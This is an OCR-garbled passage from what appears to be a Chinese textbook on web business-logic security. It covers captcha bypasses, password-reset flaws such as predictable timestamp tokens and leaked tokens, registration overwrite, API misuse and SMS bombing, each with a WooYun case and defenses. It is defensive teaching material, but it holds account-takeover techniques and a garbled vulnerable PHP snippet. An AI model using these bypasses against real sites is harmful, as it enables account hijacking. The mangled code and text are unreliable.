时 候 尽 量 用 6 位 数字 验证 ， 这 样 可 以 增加 识别 的 难度 。 


3.1.3” 空 验证 码 突破 
1. 漏洞 原因 


大 多 数 验证 码 的 生命 周期 是 这 样 的 : 用 户 访问 页 面 一 生成 Code 并 保存 到 Session 中 一 用 
户 提交 验证 码 一 用 户 提交 的 值 和 服务 器 的 值 做 对 比 。 
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2. 空 验证 码 案例 


2014 年 12 月 ， 白 帽子 “shack2” 提 交 漏 洞 “ 某 站 集 市 验证 码 机 制 绕 过 ”。 
参考 链接 : wooyun-2013-046547。 


该 系统 的 验证 码 机 制 是 用 户 请 求 页 面 后 ， 服 务 器 会 生成 验证 码 ， 并 将 验证 码 记 录 下 来 。 
当 用 户 提交 表单 时 ， 会 验证 此 验证 码 是 否 与 服务 器 中 的 一 致 。 

试想 一 下 ， 如 果 白 帽子 不 访问 页 面 ， 而 是 直接 提交 表单 ， 这 个 时 候 服务 器 是 没有 对 应 值 
的 ， 白 帽子 提交 了 验证 码 ， 照 理 来 说 是 不 能 通过 的 。 但 是 白 帽 子 提交 的 验证 码 为 空 的 时 候 ， 
正好 与 服务 器 的 空 值 所 对 应 ， 因 为 PHP 是 弱 类 型 语言 ， 于 是 就 成 功 地 绕 过 了 验证 码 。 

如 图 3-6 所 示 ， 白 帽子 利用 Burp Suite 更 改 了 表单 数据 。 


raw | params | headers | hex 

GET 

/ajaxdo. phprmodule=buyrevardsr=0.17227257579231365token-- egies cid=77 chr ice=!ccaptchal 

uy=2msc HTTP/1.1 

Host: wv.vooyun.org 

User-Agent: Mozilla/5|0 (Windows NT €.3; WOWE4; rv:25.0) Gecko/20100101 Firefox/25.0 

Accept: application/json, text/javascript, */* 

Accept-Language: zh-cn,zh;d=0.9,en-us;d=0.5,en;q=0.3 

Accept-Encoding: gzip, deflate 

Content-Type: application/x-www-form-urlencoded 

te XL tpRequeat 
了 




































] 二 | 

















response 
TaW | headers | hex 

Expires: Thu, 19 Nov 1981 08:52:00 GMT 

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check"0 
Pragma: no-cache 

Via: 10,67,.15.39 

Content-Length: 48 

















":"\u9aBo\uBbol\u7801\u9519\uBbef"} 

















3-6 白 帽 子 更 改 表 单数 据 


下 面 是 抽象 出 来 的 代码 片段 : 

<2php 

让 ($_POST["captcha"] !=$ SESSION["captcha"]) { 
/ 验证 不 通过 ， 清 空 验证 码 ， 返 回 false 
unset($_SESSION["captcha"]): 
return ['status' => false, 'msg' => ' 验 证 失败 "]; 

} 

return ['status' => true, 'msg' => 验证 成 功 ]; 


从 代码 中 可 以 看 出 ， 如 果 code 和 codel 不 一 样 ， 就 会 清空 SESSION 中 的 数据 ， 并 且 提 
示 验 证 码 错误 ， 而 在 这 里 为 了 防止 验证 码 被 多 次 使 用 ， 将 SESSION 中 的 信息 给 清空 了 。 
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此 时 如 果 攻 击 者 没有 访问 验证 码 生成 页 面 ,SESSION 中 的 captcha 这 个 key 是 不 存在 的 ， 
PHP 是 弱 类 型 语言 , 空 值 和 变量 不 存在 做 对 比 , 结果 是 相等 的 , 也 就 造成 了 code 等 于 codel， 
然后 就 验证 成 功 了 ， 于 是 成 功 地 绕 过 了 验证 码 验证 机 制 。 

其 实 修复 此 漏洞 比较 简单 ， 只 需要 在 做 对 比 之 前 限制 空 验证 码 就 可 以 防止 此 漏洞 的 产生 : 


让 (empty($_ POST['captcha])) { 
return [status' => false, 'msg' => ' 验 证 失败 1]; 








} 

3. 防范 方法 

在 检测 用 户 的 验证 码 时 ， 要 先 判 断 验 证 码 值 是 否 为 空 ， 在 值 不 为 空 的 时 候 再 做 比较 。 
3.1.4” 绕 过 测试 

很 多 网 站 为 了 方便 用 户 ， 设 置 了 第 一 次 登录 无 须 验证 码 ， 当 用 户 第 一 次 输入 不 正确 时 ， 
才 会 需要 验证 码 。 但 判断 用 户 是 否 第 一 次 登录 的 依据 是 什么 呢 ? 很 多 开发 者 并 不 知道 ,因此 
造成 了 验证 码 绕 过 问题 。 

1. 漏洞 原因 

有 一 部 分 开发 者 通过 Session 信 息 来 判断 是 否 启用 验证 码 , 但 攻击 者 可 以 每 次 访问 前 都 清 
理 掉 sessionid， 这 样 就 会 造成 绕 过 验证 码 漏洞 。 

2. 后 台 OA 系统 绕 过 案例 

2016 年 6 月 ， 白 帽子 “路 人 甲 ”提交 漏洞 “ 某 网 站 后 台 重 要 系统 设计 逻辑 缺陷 (成 功 


绕 过 验证 码 限制 ) 影 响 内 部 敏感 信息 ”。 

参考 链接 : wooyun-2016-0215312。 

白 帽 子 无 意 中 发 现 了 一 个 该 厂商 的 后 台 登 录 地 址 : http://bangong.localhost.com.cn/ 
Admin/index.php?s=/Public/login。 当 第 一 次 打开 页 面 的 时 候 , 在 页 面 中 看 到 一 个 登录 的 表单 ， 
其 中 表单 所 需要 的 输入 项 为 用 户 名 和 密码 ， 没 有 验证 码 ， 如 图 3-7 所 示 。 

于 是 白 帽 子 就 想到 暴力 破解 账户 和 密码 , 使 用 了 一 些 暴力 破解 工具 开始 测试 。 实施 暴力 
测试 的 时 候 却 发 现 第 一 次 不 需要 验证 码 ， 但 是 第 二 次 、 第 三 次 请 求 都 是 需要 输入 验证 码 的 ， 
如 图 3-8 所 示 。 

这 时 候 白 帽子 想到 既然 第 一 次 不 需要 验证 码 , 是 不 是 能 让 服务 器 觉得 每 次 提交 都 是 第 一 
次 呢 ? 围绕 这 个 目标 ， 经 过 多 次 推理 和 测试 ， 终 于 发 现 判 断 是 否 显示 验证 码 的 规则 是 通过 服 
务 器 的 Session 信息 来 进行 的 。 
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Ee 


2 

DT 
登录 

图 3-7 登录 表单 没有 验证 码 图 3-8 需要 输入 验证 码 





判断 的 逻辑 大 体 是 , 如 果 之 前 有 过 数据 提交 , 并 且 验 证 不 通过 , 下 次 就 需要 提交 验证 码 。 
于 是 想到 了 一 个 对 应 的 绕 过 方法 ，Session 是 基于 Cookie 来 保持 会 话 的 ， 每 次 提交 数据 的 时 
候 都 更 改 sessionid， 这 样 服务 器 在 判断 Session 信息 时 ， 就 不 知道 前 台 提 交 的 是 多 次 提交 过 
的 数据 ， 也 就 不 需要 验证 码 来 验证 了 。 

3. 防范 方法 

这 个 漏洞 的 主要 原因 在 于 无 法 杜绝 第 一 次 正确 检测 ， 所 以 在 开发 类 似 功 能 的 时 候 , 一 定 
要 想到 判断 是 否 能 被 用 户 通过 更 改 Cookie 的 方式 来 绕 过 。 

4. 小 结 


Web 系 统 很 难 界定 用 户 是 否 是 首次 访问 ， 所 以 在 设计 此 类 需求 的 时 候 ， 不 要 使 用 单一 维 
度 来 界定 ， 而 是 使 用 多 维度 来 判断 ， 比 如 用 户 的 IP 地 址 、 登 录 的 用 户 名 、 操 作 的 频次 等 多 方 
面 因素 。 


3.1.5 凭证 返回 

因为 开发 不 严谨 ， 导 致 通过 抓 包 可 以 看 到 验证 码 在 回 显 中 显示 ， 如 图 3-9 所 示 。 

由 于 验证 码 直接 返回 ， 因 此 通过 该 漏洞 可 以 注册 任意 用 户 、 重 置 已 注册 用 户 密码 、 修 改 
绑 定 信息 等 高 危 操 作 ， 对 用 户 造成 一 定 影响 。 


因此 ， 不 要 将 短信 验证 码 在 回 显 中 显示 ， 验 证 码 只 存在 于 服务 端 中 ， 不 能 通过 任何 API 
直接 获取 。 
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找 回 密码 
输入 您 的 手机 号 码 ， 正 取 验证 和 过 信 后 重要 码 


15934553775 


css Timaine Profles Resources Audks Console 
e log Disable cache 


x Headers | Preview | Response Cookies Tmng 








图 3-9 验证 码 在 回 显 中 显示 
3.1.6 小 结 


目前 , 大 部 分 企业 还 是 偏向 使 用 图 片 验证 码 , 在 测试 过 程 中 只 有 极 少数 公司 会 动态 升级 
自己 的 图 片 验证 码 ， 随 着 输 错 次 数 的 上 升 ， 验 证 码 难度 也 随机 上 升 。 统 一 验证 码 的 设计 初 囊 
是 好 的 ,即使 攻击 者 使 用 了 OCR 技术 进行 破解 ,一 旦 失败 数 触发 到 阔 值 ， 即 自动 上 升 图 片 验 
证 码 的 难度 ， 以 增加 破解 成 本 。 

为 了 防止 验证 码 被 朴 虫 获取 后 专门 进行 分 析 和 针对 性 地 破解 攻击 , 需要 准备 多 套图 片 验 
证 码 定期 进行 蔡 换 。 





3.2 密码 找 回 


为 了 防止 用 户 遗 忘 密码 ,大 多 数 网 站 都 提供 了 找 回 密码 功能 。 常 见 的 找 回 密码 的 方式 有 : 
邮箱 找 回 密码 、 根 据 密码 保护 问题 找 回 密码 、 根 据 手机 号 码 找 回 密码 等 。 虽然 这 些 方式 都 可 
以 找 回 密码 ， 但 实现 方式 各 不 相同 。 无 论 是 哪 种 密码 找 回 方式 ， 在 找 回 密码 时 ， 除 了 自己 的 
用 户 密码 外 ， 如 果 还 能 找 回 其 他 用 户 的 密码 ， 就 存在 密码 找 回 漏洞 。 

密码 找 回 逻 辑 测试 的 一 般 流程 是 ， 首 先 尝试 正常 密码 找 回流 程 ， 选 择 不 同 的 找 回 方式 ， 
记录 所 有 数据 包 ， 分 析 数 据 包 ， 找 到 敏感 部 分 ， 分析 后 台 找 回 机 制 所 采用 的 验证 手段 ， 修 改 
数据 包 验 证 推测 。 
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3.2.1 敏感 信息 泄露 

1. 漏洞 成 因 

现在 Web 网 站 用 异步 请 求 的 地 方 越 来 越 多 ,在 找 回 密码 的 地 方 也 不 例外 ,不 过 找 回 密码 
的 位 置 和 别 的 地 方 有 些 不 一 样 ， 这 个 位 置 的 数据 特别 敏感 ， 如 果 返 回 了 一 些 敏感 数据 就 不 太 
好 了 。 比 如 找 回 密码 一 般 需要 查询 用 户 信息 ， 如 果 用 的 是 select * from user username = daxia， 
然后 又 把 结果 通过 JSON 直 接 返 回 ， 就 会 出 现 用 户 密码 直接 被 返回 。 

当然 ， 直接 返回 密码 的 地 方 并 不 多 见 , 但 是 返回 其 他 的 敏感 信息 可 不 少 ， 比 如 找 回 密码 
经 常会 用 到 一 些 验证 码 ， 如 手机 短信 验证 码 、 邮 箱 的 token。 如 果 这 些 信 息 被 返回 了 ， 同 样 
会 出 现任 意 用 户 密码 修改 漏洞 。 

2. 验证 码 前 台 返 回 案例 

2014 年 5 月 ， 白 帽子 “px1624” 提 交 漏 洞 “ 某 网 站 任意 账户 密码 重 置 (二 ) ”。 

缺陷 编号 : wooyun-2014-058210。 

这 个 漏洞 出 现 的 原因 正 是 把 token 给 返回 了 ， 如 图 3-10 所 示 。 

















EE 






































4082 4082 和 


ee 








图 3-10 返回 了 token 


这 个 表单 通过 Ajax 提交 数据 后 ， 返 回 了 一 段 JSON 格式 的 数据 ， 其 中 有 一 段 32 位 的 
token， 把 这 个 token 和 收 到 的 邮件 中 的 URL 做 了 一 下 对 比 ， 发 现 这 个 token 就 是 当前 页 面 
URL 最 后 的 部 分 。 经 过 推测 后 ， 验 证 天 天 网 的 这 个 找 回 密码 的 设计 确实 是 存在 问题 的 ， 因 
为 找 回 密码 的 URL 是 可 以 预测 的 ， 所 以 邮箱 找 回 就 可 以 直接 绕 过 了 。 

设置 新 密码 的 URL 为 : http://login.localhost.com/new/modify_password/ 加 密 字符 串 /， 如 
图 3-11 所 示 。 
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ONEnt-Cengm S7 


alucrsuccese" "2", eb 19 "frror. nl) 
本 = — 





| Headers | Cookies | Text | Hex | JavaScript | JSON | JSON Text| Raw | www.wooyun.or 





图 3-11 新 密码 的 URL 
3. 防范 方法 


此 问题 的 主要 原因 是 找 回 密码 问题 的 答案 在 页 面 源 代码 中 可 以 看 到 , 所 以 防御 相关 的 漏 
洞 需要 避免 查询 全 部 字段 信息 ， 只 返回 需要 的 字段 ， 或 者 在 返回 数据 前 做 一 次 过 滤 即 可 。 


3.2.2 邮箱 弱 token 

1. 漏洞 原因 

找 回 密码 有 两 种 常见 的 方式 ， 即 手机 验证 码 和 邮箱 token。 手 机 验证 码 都 是 随机 生成 的 
明文 ， 邮 箱 token 一 般 是 加 密 的 字符 串 ， 开 发 者 会 觉得 既然 是 加 密 的 字符 串 ， 是 不 是 可 以 不 
用 随机 的 字符 串 了 呢 ? 但 往往 由 于 未 使 用 随机 字符 串 ， 便 造成 漏洞 的 产生 。 

2. 可 预测 的 token 案例 

2012 年 8 月 ， 和 白 帽子 “牛奶 坦克 ”提交 漏洞 “ 某 站 任意 用 户 密码 修改 漏洞 ”。 

缺陷 编号 : wooyun-2012-08333 。 

此 漏洞 正 是 由 token 可 预测 原因 导致 的 ， 收 到 的 邮件 内 容 如 图 3-12 所 示 (虚拟 ) 。 





60 个 人 中 心 找 回 密码 (重要 ) ! 


重 设 址 ， 马上 重 设 密码 ! 如 果 
您 没有 进行 过 找 回 密码 的 操作 ， 请 不 要 点 击 上 述 链接 ， 并 删除 此 邮件 。 








图 3-12” 收 到 的 邮件 内 容 


白 帽 子 看 到 有 一 个 参数 VC, 值 是 一 个 32 位 的 MD5 加 密 结果 , 通过 CMD5.com 网 站 解 
密 之 后 ， 发 现 值 是 1339 744 000， 一 开始 看 到 这 个 数值 的 时 候 以 为 是 一 个 用 户 UID， 后 来 经 
过 验证 发 现 不 是 ， 于 是 再 次 猜想 是 不 是 一 个 时 间 戳 ， 格 式 化 发 现 还 真 的 是 一 个 时 间 戳 。 通 过 
这 个 规则 写 出 了 一 个 利用 脚本 ， 如 图 3-13 所 示 。 


~ $ php 360.php @gmail .com 





[CHYou Got it! 


[+JOpen this URL:http://i.360.cn/findpwd/setpndfromemail?vc= 56ef83f9f638b Eu- Sgmail .com 
[Good luck 
~$ 





图 3-13 利用 脚本 
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通过 脚本 扫描 最 近 前 后 两 分 钟 的 时 间 戳 ， 在 访问 到 图 中 的 URL 时 ， 发 现 这 个 链接 返回 
的 状态 码 为 200， 把 这 个 链接 打开 之 后 ， 发 现 真 的 是 修改 密码 页 面 。 

3. 防范 方法 

这 个 漏洞 使 用 了 特定 值 的 加 密 作为 token， 被 猜测 到 使 用 了 时 间 瀹 的 MD5 值 。 在 实际 操 
作 时 也 可 以 尝试 用 户 名 、 手 机 、 邮 箱 等 不 同 的 加 密 方式 。 
3.2.3 ”验证 的 有 效 性 

1. 漏洞 原因 

有 的 时 候 发 现 网 站 做 了 很 多 验证 项 , 表面 看 起 来 很 安全 , 但 是 实际 上 却 没 有 验证 的 价值 。 

2. 无 效 的 验证 案例 


2014 年 5 月 ， 和 白 帽 子 “ 麻 ”提交 漏洞 “ 某 站 重 置 任意 账户 密码 (3) ”。 

缺陷 编号 : wooyun-2014-053349 。 

这 是 该 厂商 的 一 个 找 回 密码 的 流程 ， 在 找 回 密码 页 面 的 第 一 步 中 输入 一 个 手机 号 
18688888888 (虚拟 ) ， 并 单 击 “确定 ”按钮 ， 如 图 3-14 所 示 。 


1. 输 入 账号 2. 选 择 方式 找 回 3. 身 份 认证 4. 重 村 密码 5. 完 成 
登录 账号 : 196898886888 铀 入 悠 的 登录 方式 邮箱 地 址 ,手机 号 码 ,用户 名 ) 
验 证 码 : ss 贡 SIWW 二 * 
SE 返回 登录 








图 3-14 输入 别人 的 手机 号 


选择 通过 手机 号 码 找 回 密码 来 到 第 三 步 身份 认证 , 白 帽子 在 此 处 可 以 重新 输入 一 个 验证 
的 手机 号 码 , 把 18688888888 替换 成 白 帽子 自己 的 手机 号 186****8188, 获取 到 验证 码 0198， 
单 击 “ 确 定 ” 按 钮 ， 如 图 3-15 所 示 。 
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1. 输 入 账号 2. 选 择 方式 找 回 3. 身 份 认证 4. 重 置 密码 5. 完 成 


通过 手机 拷 回 密码 
手机 号 码 。 186153 


点 击 获取 验证 码 。 验 正 码 格 发 送 到 手机 上 ,10 分钟 中 有 效 ， 知 未 收 到 ， 请 重新 获取 。 目 
前 妈 支 持 移动 、 联 通 手机 号 码 段 
验证 码 。 | ol98 





安全 提示 : 





图 3-15 ”获得 验证 码 
然后 来 到 修改 密码 页 面 ， 如 图 3-16 所 示 。 


1. 输 入 账号 2. 选 择 方式 找 回 3. 身 份 认证 4. 重 置 密码 5. 完 成 
和 全 炊 于 个 是 训 反 各 的 放 尖 。 请 在 此 处 重新 设置 你 的 登录 密码 ， 完 成 操作 后 
新 加码 ;ttetets + 密码 长 度 为 6-16 位 激 字 或 字母 或 字符 组 合 
确认 密码 : [eeeeees ,二 认 宣 码 发 度 为 -1 位 数字 或 字 玉 求 字符 姐 合 
bo 
安全 提示 : 


1. 如 果 您 的 帐号 设置 过 密 保 资料 ， 密 保 用 户 可 以 通过 由 答 密 保 问题 来 设置 新 密码 
2 无 保 用 户 只 有 通过 使 用 注册 邮箱 找 加 密码 或 者 帐号 申诉 来 找 加 密码 。 








图 3-16 ”修改 密码 页 面 

单 击 “ 确 定 ” 按 钮 后 ， 重 置 密码 成 功 。 

3. 防范 方法 

这 个 漏洞 的 问题 出 现在 修改 张 三 的 密码 却 可 以 用 李 四 的 手机 号 码 来 验证 , 所 以 在 做 类 似 
功能 时 ， 也 得 考虑 验证 的 作用 是 否 存在 。 
3.2.4 ”注册 覆盖 

正常 来 说 , 注册 一 个 用 户 是 往 数 据 表 中 添加 一 条 数据 ,如果 数据 已 经 存在 ,注册 就 会 失 
败 。 可 是 有 时 候 开发 者 却 不 是 这 么 做 的 ， 他 们 发 现 用 户 账号 已 经 存在 时 ， 不 是 提示 用 户 注册 
失败 ， 而 是 直接 修改 该 用 户 的 信息 。 
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漏洞 案例 
2014 年 8 月 ， 白 帽子 “路 人 甲 ”提交 漏洞 “ 某 站 奇 范 方 式 重 置 任意 用 户 密码 (admin 
用 户 演示 ) ”。 


缺陷 编号 : wooyun-2014-088708 。 

在 此 系统 的 网 站 中 有 注册 ， 也 有 密码 修改 ， 但 是 没有 密码 找 回 功能 ， 其 中 注册 网 址 为 
http://www.localhost.com/jsp/ywbl/zc.jsp。 在 用 户 注 册 时 ， 如 果 先 输入 用 户 名 ， 在 鼠标 离开 后 
会 进行 用 户 名 是 否 存在 的 校 验 , 但 是 如 果 把 用 户 名 留 着 最 后 输入 ， 比 如 输入 一 个 已 有 的 用 户 
名 admin， 在 鼠标 离开 输入 框 并 单 击 “ 提 交 ” 按 钮 后 ， 虽 然 也 会 进行 用 户 名 是 否 存在 的 校 验 ， 
但 表单 仍然 提交 上 去 了 。 

这 时 会 发 现 已 经 以 admin 的 用 户 登录 进来 了 , 而 用 户 的 密码 被 改 为 之 前 填写 的 密码 , 但 
原 用 户 的 所 有 信息 却 没有 改变 ， 也 就 是 说 这 时 获取 了 用 户 的 信息 ， 如 姓名 、 身 份 证 、 手 机 号 
等 。 白 帽子 发 现 还 可 以 用 刚才 的 用 户 登 录 此 系统 的 商城 站 点 , 在 商城 网 站 中 也 可 以 看 到 用 户 
的 一 些 资料 ， 如 图 3-17 所 示 。 


) www 95572.com/isp/gr ara jsp7Columnl 
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图 3-17 看 到 的 用 户 信 息 


在 用 户 信息 修改 页 面 , 白 帽 子 发 现 了 另 一 个 安全 隐患 , 通过 查看 源 代码 居然 可 以 看 到 数 
据 库 的 表 名 : 
<form name='forml' method='post action='grzx submit.jsp' target="grsubmit" onsubmit='return 


doValidate(forml1)> 
<input name=' tablename' type='hidden' value='p_cremember'> 
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<input name=" action" type="hidden" value="update"> 
<input name="_pkfield" type="hidden" value="U_ID"> 
<input type="hidden" name="U_ID" value="admin"> 
</form> 
上 面 的 代码 是 页 面 中 的 部 分 源 代码 ， 源 代码 中 有 一 个 input 的 name 属性 为 _tablename， 
再 看 到 里 面 的 值 ， 可 以 猜测 出 数据 库 中 的 表 名 为 p_cremember， 表 的 主键 是 U ID， 如 果 网 
站 存在 SQL 注入 漏洞 ， 或 许可 以 暴露 出 全 部 用 户 的 资料 。 


3.2.5 小结 


通过 上 面 几 个 案例 可 以 看 出 , 密码 找 回 并 不 需要 多 么 高 深 的 技术 手段 , 很 多 时 候 通 过 常 
理 推断 就 能 找 出 其 中 的 漏洞 。 





在 某 些 情况 下 , 我 们 只 想 让 某 一 部 分 用 户 可 以 访问 服务 器 的 某 些 服务 ,比如 我 们 有 自己 
的 App，App 与 服务 器 通信 依靠 的 是 API 接 口 ， 我 们 只 希望 这 些 接口 被 自己 的 App 所 调用 ， 而 
不 被 第 三 方 客户 端 所 连接 ， 这 时 开发 者 会 做 出 一 系列 防范 , 不 过 此 类 防范 很 多 情况 下 并 不 严 
谨 ， 由 此 被 攻击 者 找到 漏洞 。 

3.3.1 API 盗用 

1. 漏洞 原因 

相信 大 家 都 买 过 火车 票 ， 买 火车 票 的 时 候 发 现 可 以 用 官方 App， 也 可 以 使 用 第 三 方 App 
购 票 ， 比 如 在 春节 的 时 候 ， 或 许 你 也 会 用 刷 票 软件 来 抢 票 ， 在 使 用 这 些 软件 的 时 候 是 否 想 过 
第 三 方 软件 为 什么 可 以 买 票 呢 ? 是 12306 为 其 提供 的 接口 还 是 这 些 接口 被 App 盗 用 了 呢 ? 答 
案 显 然 是 后 者 ， 如 果 你 关注 12306 微 博 ， 或 许 每 年 都 可 以 看 到 通过 某 某 技术 手段 防止 抢 票 软 
件 抢 票 的 情况 。 

但 是 每 年 依旧 有 不 少 刷 票 软件 可 以 实现 抢 票 ， 这 显然 不 是 12306 想 要 的 效果 。 显 然 ， 如 
果 你 的 业务 比较 多 ， 就 可 能 招来 有 心 人 盗用 接口 ， 这 时 就 需要 防止 接口 被 盗用 了 。 

在 移动 互联 网 时 代 基 本 离 不 开 App， 开 发 App 无 法 避免 的 是 使 用 API 接 口 ， 如 何 防止 API 
接口 被 盗用 是 一 个 很 大 的 问题 ， 比 如 App 调 用 商品 列表 ,通过 JSON 格 式 传输 ,如 何 防 止 这 部 
分 数据 被 他 人 直接 利用 呢 ? 

从 业务 安全 和 需要 的 角度 ， 我 们 从 高 到 低 可 把 API 接 口 分 为 以 下 三 类 。 
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(1) 用 户 级 

最 高 等 级 的 标准 ， 需 要 用 户 登 录 后 才 可 以 调用 接口 进行 数据 访问 。 这 种 接口 的 请 求 可 以 
通过 服务 器 拿 到 用 户 的 详细 数据 ， 然 后 给 前 台 提供 用 户 相关 的 信息 ， 如 用 户 个 人 资料 修改 、 
重 置 修改 或 者 用 户 周边 个 人 隐私 数据 ， 这 种 级 别 的 API 接 口 目的 在 于 保护 用 户 的 个 人 隐私 以 
及 个 性 化 数据 的 交互 。 


(2) 签名 级 

相 比 用 户 级 接口 , 低 一 级 别 的 签名 级 接口 是 通过 服务 器 与 前 端 协商 好 签名 后 进行 的 数据 
交互 。 

这 种 方式 的 请 求 中 会 包含 签名 参数 , 这 个 参数 是 经 过 一 些 安全 规则 加 密 的 ， 服 务 器 在 收 
到 请 求 后 ， 也 通过 同样 的 规则 对 参数 进行 加 密 ， 然 后 与 请 求 中 的 签名 值 进行 对 比 ， 确 认 数据 
没有 被 中 途 自 改 后 ， 再 进行 下 一 步 处 理 。 

(3 ) 公开 级 

公开 级 接口 是 一 些 对 别人 来 说 没有 利用 价值 的 数据 , 不 需要 签名 认证 , 也 不 需要 用 户 合 
录 来 获取 数据 ， 这 种 接口 不 多 见 ， 只 会 在 少数 个 性 化 特征 很 强 的 地 方 出 现 ， 比 如 当前 版 本 信 
息 、Logo 图 片 地 址 、 服 务 器 时 间 。 


2. 签名 接口 实现 方法 


对 于 用 户 级 认证 和 公开 级 的 接口 来 说 ,本 节 中 没有 太 多 安全 建议 , 主要 来 看 如 何 做 签名 
级 防范 攻击 者 会 如 何 应 对 。 签 名 级 数据 被 盗 取 是 无 法 完全 防止 的 ， 可 以 做 的 是 增加 其 盗用 
的 成 本 ， 首 先 从 接口 的 设计 开始 ， 下 面 是 一 些 建议 。 


(1) HTTPS 
攻击 后 要 盗用 API 接 口 ， 首 先 得 抓 包 分 析 ， 如 果 你 使 用 HTTPS 协 议 ， 攻 击 者 在 抓 包 时 必 
须 安 装 一 个 本 地 的 证 书 ， 相 对 来 说 会 增加 一 些 障碍 。 


(2 ) 接口 参数 的 效 验 

这 是 最 有 效 的 一 种 方法 ， 有 必要 设置 一 些 验证 参数 。 有 两 种 常见 的 做 法 ， 一 种 是 MD5 
校 检 值 形式 。 设 置 一 个 loken 参 数 ， 这 个 参数 是 一 个 MD5 值 ， 其 原文 是 请 求 的 其 他 参数 和 一 
些 固定 的 加 密 字符 串 〈 盐 ) 的 组 合 。 建 议 再 加 上 一 个 时 间 (time) 参数 ， 可 以 是 当前 的 时 间 
截 , 把 这 个 time 参 数 也 融合 到 token 里 面 去 , 笔者 了 解 到 之 前 乐 视 网 的 很 多 接口 和 视频 地 址 就 
是 采用 的 此 形式 。 

另 一 种 是 算法 加 密 字符 串 形式 。 和 上 面 的 MD5 差 不 多 ， 只 不 过 是 把 参数 用 AES/DES 之 
类 的 对 称 或 者 非 对 称 算法 加 密 之 后 作为 一 个 验证 参数 。 服务 器 接 到 请 求 之 后 ,解密 参数 ， 检 
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查 是 否 正 确 。 这 里 面 还 可 以 加 入 一 些 客户 端的 本 地 信息 作为 判断 依据 ,优酷 和 腾讯 视频 就 是 
采用 的 此 形式 。 

(3 ) 本 地 加 密 混 消 

上 面 第 (2) 点 提 到 的 验证 参数 不 建议 直接 放 到 本 地 代码 里 面 。 无 论 是 Android 里 面 的 Java 
代码 ， 还 是 Flash 里 面 的 AS 代码 ， 都 非常 容易 被 反 编译 ， 很 容易 就 可 以 看 到 源 代 码 ， 所 以 要 
放 到 独立 的 模块 中 。 例 如 优酷 、 腾 讯 视频 等 都 使 用 了 此 技术 。 

对 于 Android 程序 ， 笔 者 建议 把 加 密 的 部 分 放 到 so 文件 中 ， 这 样 破解 者 即使 想 破 解 ， 
也 得 用 上 反 汇 编 工具 。 

(4 ) 请 求 频次 限制 

对 每 个 应 用 分 配 一 个 appid， 单 个 appid 可 以 设置 其 请 求 频率 ，appid 很 容易 伪造 ， 所 以 建 
议 服务 器 生成 ， 本 地 只 记录 和 传递 。 服 务 器 接 到 响应 后 ， 判 断 时 间 戳 是 否 在 有 效 时 间 内 ， 时 
间 间 隔 可 以 根据 安全 范围 而 定 ， 可 以 是 3 分 钟 、5 分 钟 、10 分 钟 或 者 30 秒 等 ， 过 期 就 会 失效 ， 
需要 注意 保证 服务 器 和 客户 端的 时 间 为 同一 时 间 。 
国内 公 网 不 多 , 很 多 运营 商都 是 共用 公 网 IP, 会 出 现 很 多 用 户 用 一 个 公 网 IP 的 现象 ， 
所 以 用 耳 限 制 的 话 可 以 把 范围 稍微 扩大 ， 和 否则 会 影响 正常 用 户 的 访问 。 

有 时 候 会 考虑 通过 X-Forwarded-For 来 获得 用 户 的 真实 了 下， 不 过 HTTP Header 中 的 
X-Forwarded-For 参 数 是 可 以 直接 伪造 的 ， 所 以 通过 X-Forwarded-For 获 取 真 实 卫 的 可 靠 性 不 高 。 


(5 ) 定期 检查 访问 日 志 

上 面 提 到 不 建议 对 IP 进 行 限制 , 怎么 办 呢 ? 请 务必 定期 检查 服务 器 的 访问 日 志 , 这 样 很 
容易 筛选 、 排 查 出 异常 卫 。 找 出 异常 流量 的 了 P 之 后 ， 上 网 搜索 这 些 IP， 判 断 是 否 有 服务 器 在 
盗 链 ， 然 后 屏蔽 掉 这 些 卫 。 


3.3.2 ”短信 各 


短信 故 炸 主要 是 通过 特制 的 软件 不 断 地 向 一 个 手机 号 码 发 重复 的 垃圾 短信 , 以 达到 骚扰 
和 恶搞 的 效果 。 而 网 络 上 需要 用 到 手机 验证 的 地 方 非常 多 ， 常 见于 注册 、 忘 记 密码 、 确 认 下 
单 等 阶段 ， 特 别 是 涉及 用 户 个 人 敏感 行为 时 ， 为 了 确认 操作 是 用 户 本 人 执行 的 ， 通 常会 使 用 
短信 验证 码 进行 二 次 认证 。 

短信 炸弹 就 是 利用 这 些 验证 码 来 做 文章 , 使 用 特制 的 软件 不 停 地 请 求 验证 码 , 不 停 地 给 
“受害 人 ”发 送 验证 短信 。 对 于 一 些 比较 知名 的 网 站 的 验证 码 短信 ,手机 安全 管理 软件 大 多 
不 会 拦截 ， 所 以 会 导致 手机 遭遇 短信 又 炸 。 
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1. 漏洞 原因 

经 常 看 到 这 种 新 闻 ,， 某 人 因 网 购 给 差 评 后 ， 手 机 收 到 无 数 骚 扰 短 信 。 这 些 短信 从 哪里 发 
出 来 的 呢 ? 其 实 就 是 很 多 个 网 站 的 手机 验证 码 。 为 什么 这 么 多 网 站 会 不 断 地 发 短信 到 一 个 手 
机 号 码 中 呢 ? 可 以 通过 短信 比 炸 原理 得 到 答案 。 

短信 色 炸 一 般 基于 客户 端 和 服务 端 两 部 分 组 成 ,包括 : 一 个 前 端 Web 页 面 ， 页 面 中 有 一 
个 表单 ， 提 供 输入 被 攻击 者 的 手机 号 码 ; 一 个 后 台数 据 处 理 攻 击 部 分 ， 利 用 从 各 个 网 站 上 找 
到 的 动态 短信 URL 和 前 端 输入 的 被 攻击 者 手机 号 码 发 送 HTTP 请 求 ， 每 次 请 求 给 用 户 发 送 一 
个 动态 短信 。 

多 被 攻击 者 大 量 接收 非 自身 请 求 的 短信 ， 造 成 无 法 正常 使 用 移动 运营 商业 务 。 

多 短信 接口 被 刷 通常 指 的 就 是 网 站 的 动态 短信 发 送 接 口 被 此 类 短信 和 圳 炸 工具 收集 ， 作 

为 其 中 一 个 发 送 途 径 。 

具体 工作 原理 如 下 

(1) 攻击 者 在 前 端 页 面 中 输入 受害 者 的 手机 号 。 

(2) 短信 猥 炸 工 具 的 后 台 服 务 器 ， 将 该 手机 号 与 互联 网 收集 的 不 需要 经 过 认证 即 可 发 
送 动态 短信 的 URL 进 行 组 合 ， 形 成 可 发 送 动态 短信 的 URL 请 求 。 

(3) 通过 后 台 请 求 页 面 伪 造 用 户 的 请 求 ， 发 给 不 同 的 业务 服务 器 。 

(4) 业务 服务 器 收 到 该 请 求 后 ， 发 送 动态 短信 到 被 攻击 用 户 的 手机 上 。 

流程 示例 如 图 3-18 所 示 。 




















